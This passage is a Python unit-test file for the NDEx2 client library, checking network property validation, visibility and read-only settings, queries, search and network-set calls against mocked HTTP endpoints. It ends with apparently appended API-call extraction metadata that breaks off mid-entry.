try:
ndex._validate_network_system_properties({})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertTrue('network_properties appears to '
'be empty' in str(ne))
# try passing invalid property
try:
ndex._validate_network_system_properties({'showcase': True,
'foo': 'blah'})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('foo is not a valid network system '
'property', str(ne))
# try passing invalid readOnly property
try:
ndex._validate_network_system_properties({'showcase': True,
'readOnly': 'blah'})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('readOnly value must be a bool '
'set to True or False', str(ne))
# try passing invalid showcase property
try:
ndex._validate_network_system_properties({'showcase': 'haha'})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('showcase value must be a bool '
'set to True or False', str(ne))
# try passing invalid index_level property as bool
try:
ndex._validate_network_system_properties({'index_level':
False})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('index_level value must be '
'a string set to NONE, META, or ALL', str(ne))
# try passing invalid index_level property
try:
ndex._validate_network_system_properties({'index_level':
'blah'})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('index_level value must be '
'a string set to NONE, META, or ALL', str(ne))
# try passing invalid visibility property bool
try:
ndex._validate_network_system_properties({'visibility': True})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('visibility value must be '
'a string set to PUBLIC or PRIVATE',
str(ne))
# try passing invalid visibility property
try:
ndex._validate_network_system_properties({'visibility':
'ha'})
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('visibility value must be '
'a string set to PUBLIC or PRIVATE',
str(ne))
# try passing valid dict
valid_dict = {'showcase': True,
'visibility': 'PUBLIC',
'index_level': 'ALL',
'readOnly': True}
res = ndex._validate_network_system_properties(valid_dict)
check_dict = json.loads(res)
self.assertEqual(valid_dict, check_dict)
# try passing dict with validation off
res = ndex._validate_network_system_properties({},
skipvalidation=True)
self.assertEqual('{}', res)
def test_set_network_system_properties_test_no_auth(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.set_network_system_properties('236ecfce-be48-4652-'
'b488-b08f0cc9c795',
{'visibility': 'PUBLIC'})
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('This method requires user '
'authentication', str(ne))
def test_set_network_system_properties_invalid_propertytype(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2(username='bob', password='<PASSWORD>')
try:
ndex.set_network_system_properties('236ecfce-be48-4652-b488-'
'b08f0cc9c795',
True)
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('network_properties '
'must be a string or a dict', str(ne))
def test_set_network_system_properties_ndexv1(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
ndex = Ndex2(username='bob', password='<PASSWORD>')
valid_dict = {'showcase': True,
'visibility': 'PUBLIC',
'index_level': 'ALL',
'readOnly': True}
try:
ndex.set_network_system_properties(theuuid,
valid_dict)
self.fail('Expected NDExUnsupportedCallError')
except NDExUnsupportedCallError as ne:
self.assertEqual('This call only works with NDEx 2+',
str(ne))
def test_set_network_system_properties_success(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/' +
theuuid + '/systemproperty',
request_headers={'Content-Type': 'application/json;'
'charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'},
status_code=200,
text='')
ndex = Ndex2(username='bob', password='<PASSWORD>')
valid_dict = {'showcase': True,
'visibility': 'PUBLIC',
'index_level': 'ALL',
'readOnly': True}
res = ndex.set_network_system_properties(theuuid,
valid_dict)
self.assertEqual('', res)
checkdict = json.loads(m.last_request.text)
self.assertEqual(valid_dict, checkdict)
def test_make_network_public_noauth(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.make_network_public('236ecfce-be48-4652-b488-'
'b08f0cc9c795')
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('This method requires user authentication',
str(ne))
def test_make_network_public_success(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/' +
theuuid + '/systemproperty',
request_headers={'Content-Type': 'application/json;'
'charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'},
status_code=200,
text='')
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.make_network_public(theuuid)
self.assertEqual('', res)
checkdict = json.loads(m.last_request.text)
self.assertEqual({'visibility': 'PUBLIC'}, checkdict)
def test_make_network_private_noauth(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.make_network_private('236ecfce-be48-4652-b488-'
'b08f0cc9c795')
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('This method requires user authentication',
str(ne))
def test_make_network_private_success(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/' +
theuuid + '/systemproperty',
request_headers={'Content-Type': 'application/json;'
'charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'},
status_code=200,
text='')
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.make_network_private(theuuid)
self.assertEqual('', res)
checkdict = json.loads(m.last_request.text)
self.assertEqual({'visibility': 'PRIVATE'}, checkdict)
def test_make_network_public_indexed_noauth(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex._make_network_public_indexed('236ecfce-be48-4652-'
'b488-b08f0cc9c795')
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('This method requires user authentication',
str(ne))
def test_make_network_public_indexed_success(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/' +
theuuid + '/systemproperty',
request_headers={'Content-Type': 'application/json;'
'charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'},
status_code=200,
text='')
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex._make_network_public_indexed(theuuid)
self.assertEqual('', res)
checkdict = json.loads(m.last_request.text)
self.assertEqual({'visibility': 'PUBLIC',
'index_level': 'ALL',
'showcase': True}, checkdict)
def test_make_network_public_indexed_ndexv1(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
ndex = Ndex2(username='bob', password='<PASSWORD>')
try:
ndex._make_network_public_indexed(theuuid)
self.fail('Expected NDExUnsupportedCallError')
except NDExUnsupportedCallError as ne:
self.assertEqual('Only 2+ of NDEx supports '
'setting/changing index level', str(ne))
def test_set_read_only_noauth(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.set_read_only('236ecfce-be48-4652-b488-b08f0cc9c795',
True)
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('This method requires user authentication',
str(ne))
def test_set_read_only_true_success(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/' +
theuuid + '/systemproperty',
request_headers={'Content-Type': 'application/json;'
'charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'},
status_code=200,
text='')
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.set_read_only(theuuid, True)
self.assertEqual('', res)
checkdict = json.loads(m.last_request.text)
self.assertEqual({'readOnly': True}, checkdict)
def test_set_read_only_false_success(self):
theuuid = '236ecfce-be48-4652-b488-b08f0cc9c795'
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.put(client.DEFAULT_SERVER + '/v2/network/' +
theuuid + '/systemproperty',
request_headers={'Content-Type': 'application/json;'
'charset=UTF-8',
'Accept': 'application/json',
'User-Agent': client.userAgent},
headers={'Content-Type': 'application/foo'},
status_code=200,
text='')
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.set_read_only(theuuid, False)
self.assertEqual('', res)
checkdict = json.loads(m.last_request.text)
self.assertEqual({'readOnly': False}, checkdict)
def test_get_network_as_cx_stream_success(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(client.DEFAULT_SERVER + '/v2/network/someid',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_network_as_cx_stream('someid')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_network_as_cx_stream_success_ndexv1(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.get(client.DEFAULT_SERVER + '/rest/network/someid/asCX',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_network_as_cx_stream('someid')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_network_aspect_as_cx_stream_success(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(client.DEFAULT_SERVER + '/v2/network/someid/aspect/sa',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_network_aspect_as_cx_stream('someid', 'sa')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_network_aspect_as_cx_stream_success_ndexv1(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.get(client.DEFAULT_SERVER + '/rest/network/someid/asCX',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_network_aspect_as_cx_stream('someid', 'sa')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_neighborhood_as_cx_stream(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
status_code=200,
json={'hi': 'bye'},
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_neighborhood_as_cx_stream('someid',
'query')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_neighborhood_as_cx_stream_ndexv1(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.post(client.DEFAULT_SERVER + '/rest/network/someid/query',
status_code=200,
json={'hi': 'bye'},
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_neighborhood_as_cx_stream('someid',
'query')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_neighborhood(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
status_code=200,
json={'data': [{'hi': 'bye'}]},
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_neighborhood('someid', 'query')
self.assertEqual(res, [{'hi': 'bye'}])
def test_get_neighborhood_list_return(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
status_code=200,
json=[{'hi': 'bye'}],
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_neighborhood('someid', 'query')
self.assertEqual(res, [{'hi': 'bye'}])
def test_get_neighborhood_str_return(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/search/network/someid/query',
status_code=200,
json='blah',
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_neighborhood('someid', 'query')
self.assertEqual(res, 'blah')
def test_get_neighborhood_ndexv1(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
ndex = Ndex2()
ndex.set_debug_mode(True)
try:
ndex.get_neighborhood('someid', 'query')
self.fail('Expected Exception')
except Exception as e:
self.assertEqual('get_neighborhood is not supported for '
'versions prior to 2.0, use '
'get_neighborhood_as_cx_stream', str(e))
def test_upload_file(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.upload_file('foo')
self.fail('Expected NDExError')
except NDExError:
pass
def test_get_interconnectquery_as_cx_stream(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER +
'/v2/search/network/someid/interconnectquery',
status_code=200,
json={'hi': 'bye'},
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_interconnectquery_as_cx_stream('someid',
'query')
self.assertEqual(res.json(), {'hi': 'bye'})
self.assertEqual(res.status_code, 200)
def test_get_interconnectquery(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER +
'/v2/search/network/someid/interconnectquery',
status_code=200,
json={'data': [{'hi': 'bye'}]},
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_interconnectquery('someid', 'query')
self.assertEqual(res, [{'hi': 'bye'}])
def test_get_interconnectquery_as_list(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER +
'/v2/search/network/someid/interconnectquery',
status_code=200,
json=[{'hi': 'bye'}],
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_interconnectquery('someid', 'query')
self.assertEqual(res, [{'hi': 'bye'}])
def test_get_interconnectquery_as_str(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER +
'/v2/search/network/someid/interconnectquery',
status_code=200,
json='foo',
request_headers={'Connection': 'close'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_interconnectquery('someid', 'query')
self.assertEqual(res, 'foo')
def test_search_networks(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER +
'/v2/search/network?start=0&size=100',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.search_networks(search_string='hi',
account_name='bob',
include_groups=True)
self.assertEqual(res, {'hi': 'bye'})
def test_search_networks_ndexv1(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.post(client.DEFAULT_SERVER + '/rest/network/search/0/100',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.search_networks(search_string='hi',
account_name='bob',
include_groups=True)
self.assertEqual(res, {'hi': 'bye'})
def test_search_networks_by_property_filter(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.search_networks_by_property_filter()
self.fail('Expected Exception')
except Exception:
pass
def test_get_network_summary(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(client.DEFAULT_SERVER + '/v2/network/someid/summary',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_network_summary('someid')
self.assertEqual(res, {'hi': 'bye'})
def test_get_network_summary_ndexv1(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict(version=None))
m.get(client.DEFAULT_SERVER + '/rest/network/someid',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
ndex.set_debug_mode(True)
res = ndex.get_network_summary('someid')
self.assertEqual(res, {'hi': 'bye'})
def test_delete_networkset_none_passed_in(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
ndex.set_debug_mode(True)
try:
ndex.delete_networkset(None)
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('networkset id cannot be None',
str(ne))
def test_delete_networkset_non_string_passed_in(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
ndex.set_debug_mode(True)
try:
ndex.delete_networkset(True)
self.fail('Expected exception')
except NDExInvalidParameterError as ne:
self.assertEqual('networkset id must be a string',
str(ne))
def test_delete_networkset_not_authorized(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.delete_networkset('someid')
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('This method requires user authentication',
str(ne))
def test_delete_networkset_success(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
status_code=204,
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
self.assertEqual(None, ndex.delete_networkset('someid'))
def test_delete_networkset_server_says_not_authorized(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
status_code=401,
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
try:
ndex.delete_networkset('someid')
self.fail('Expected exception')
except NDExUnauthorizedError as ne:
self.assertEqual('Not authorized', str(ne))
def test_delete_networkset_server_says_not_found(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
status_code=404,
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
try:
ndex.delete_networkset('someid')
self.fail('Expected exception')
except NDExNotFoundError as ne:
self.assertEqual('Network set with id: someid not found',
str(ne))
def test_delete_networkset_server_500_error_no_json(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
status_code=500,
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
try:
ndex.delete_networkset('someid')
self.fail('Expected exception')
except NDExError as ne:
self.assertEqual('Unknown error server returned '
'status code: 500',
str(ne))
def test_delete_networkset_server_503_with_json(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
status_code=503,
json={"errorCode": "string",
"message": "string",
"description": "string",
"stackTrace": "string",
"threadId": "string",
"timeStamp": "2019-09-09T16:36:25.699Z"},
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
try:
ndex.delete_networkset('someid')
self.fail('Expected exception')
except NDExError as ne:
self.assertTrue('Unknown error server returned '
'status code: 503 : ' in str(ne))
def test_get_task_by_id_no_auth(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.get_task_by_id('someid')
self.fail('Expected Exception')
except NDExUnauthorizedError:
pass
def test_get_task_by_id_success(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.get(client.DEFAULT_SERVER + '/v2/task/someid',
status_code=200,
json={'hi': 'bye'},
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.get_task_by_id('someid')
self.assertEqual('bye', res['hi'])
def test_add_networks_to_networkset(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/networkset/aid/members',
status_code=200,
json='',
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.add_networks_to_networkset('aid', ['someid'])
self.assertEqual('', res)
def test_get_network_ids_for_user_invalid_offset_limit(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.get_network_ids_for_user('bob', limit=None, offset=5)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Limit must be set to a positive '
'number to use offset', str(ne))
# try where limit is str and offset is None
try:
ndex.get_network_ids_for_user('bob', limit='ha', offset=None)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Limit must be an int', str(ne))
# try where limit is str and offset is str
try:
ndex.get_network_ids_for_user('bob', offset='3')
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Offset must be an int', str(ne))
def test_get_network_ids_for_user_success_no_ids(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(resurl, json={'externalId': '12345'},
headers={'Content-Type': 'application/json'})
resurl = client.DEFAULT_SERVER + '/v2/user/12345/networksummary?offset=0&limit=1000'
m.get(resurl,
json=[],
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_network_ids_for_user('bob')
self.assertEqual([], res)
def test_get_network_ids_for_user_success_with_ids(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(resurl, json={'externalId': '12345'},
headers={'Content-Type': 'application/json'})
resurl = client.DEFAULT_SERVER + '/v2/user/12345/networksummary?offset=0&limit=1000'
m.get(resurl,
json=[{'externalId': '1'}, {'externalId': '2'}],
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_network_ids_for_user('bob')
self.assertEqual(2, len(res))
self.assertTrue('1' in res)
self.assertTrue('2' in res)
|
[
"ndex2.client.DecimalEncoder",
"unittest.mock.MagicMock",
"json.loads",
"decimal.Decimal",
"requests_mock.mock",
"json.dumps",
"ndex2.client.Ndex2",
"numpy.int32",
"numpy.int64",
"os.getenv"
] |
[((1625, 1641), 'ndex2.client.DecimalEncoder', 'DecimalEncoder', ([], {}), '()\n', (1639, 1641), False, 'from ndex2.client import DecimalEncoder\n'), ((2484, 2507), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (2489, 2507), False, 'from ndex2.client import Ndex2\n'), ((3141, 3250), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""xxxlocalhost"""', 'username': '"""bob"""', 'password': '"""<PASSWORD>"""', 'user_agent': '"""yo"""', 'debug': '(True)', 'timeout': '(1)'}), "(host='xxxlocalhost', username='bob', password='<PASSWORD>',\n user_agent='yo', debug=True, timeout=1)\n", (3146, 3250), False, 'from ndex2.client import Ndex2\n'), ((7785, 7808), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (7790, 7808), False, 'from ndex2.client import Ndex2\n'), ((8097, 8120), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (8102, 8120), False, 'from ndex2.client import Ndex2\n'), ((8262, 8302), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""', 'user_agent': '"""hi"""'}), "(host='localhost', user_agent='hi')\n", (8267, 8302), False, 'from ndex2.client import Ndex2\n'), ((8538, 8561), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (8543, 8561), False, 'from ndex2.client import Ndex2\n'), ((9045, 9068), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (9050, 9068), False, 'from ndex2.client import Ndex2\n'), ((9266, 9277), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (9275, 9277), False, 'from unittest.mock import MagicMock\n'), ((9303, 9314), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (9312, 9314), False, 'from unittest.mock import MagicMock\n'), ((834, 864), 'os.getenv', 'os.getenv', (['"""NDEX2_TEST_SERVER"""'], {}), "('NDEX2_TEST_SERVER')\n", (843, 864), False, 'import os\n'), ((1902, 1920), 'decimal.Decimal', 'decimal.Decimal', (['(5)'], {}), '(5)\n', (1917, 1920), False, 'import decimal\n'), ((2031, 2043), 'numpy.int64', 'np.int64', (['(12)'], {}), '(12)\n', (2039, 2043), True, 'import numpy as np\n'), ((3793, 3813), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (3811, 3813), False, 'import requests_mock\n'), ((3949, 3971), 'ndex2.client.Ndex2', 'Ndex2', ([], {'user_agent': 'None'}), '(user_agent=None)\n', (3954, 3971), False, 'from ndex2.client import Ndex2\n'), ((4096, 4116), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (4114, 4116), False, 'import requests_mock\n'), ((4299, 4306), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (4304, 4306), False, 'from ndex2.client import Ndex2\n'), ((4809, 4829), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (4827, 4829), False, 'import requests_mock\n'), ((5144, 5151), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (5149, 5151), False, 'from ndex2.client import Ndex2\n'), ((5655, 5675), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (5673, 5675), False, 'import requests_mock\n'), ((5927, 5934), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (5932, 5934), False, 'from ndex2.client import Ndex2\n'), ((6436, 6456), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (6454, 6456), False, 'import requests_mock\n'), ((7153, 7173), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (7171, 7173), False, 'import requests_mock\n'), ((7309, 7316), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (7314, 7316), False, 'from ndex2.client import Ndex2\n'), ((10049, 10069), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (10067, 10069), False, 'import requests_mock\n'), ((10274, 10281), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (10279, 10281), False, 'from ndex2.client import Ndex2\n'), ((10421, 10441), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (10439, 10441), False, 'import requests_mock\n'), ((11030, 11037), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (11035, 11037), False, 'from ndex2.client import Ndex2\n'), ((11213, 11233), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (11231, 11233), False, 'import requests_mock\n'), ((11822, 11829), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (11827, 11829), False, 'from ndex2.client import Ndex2\n'), ((12184, 12204), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (12202, 12204), False, 'import requests_mock\n'), ((12793, 12800), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (12798, 12800), False, 'from ndex2.client import Ndex2\n'), ((13162, 13182), 'requests_mock.mock', 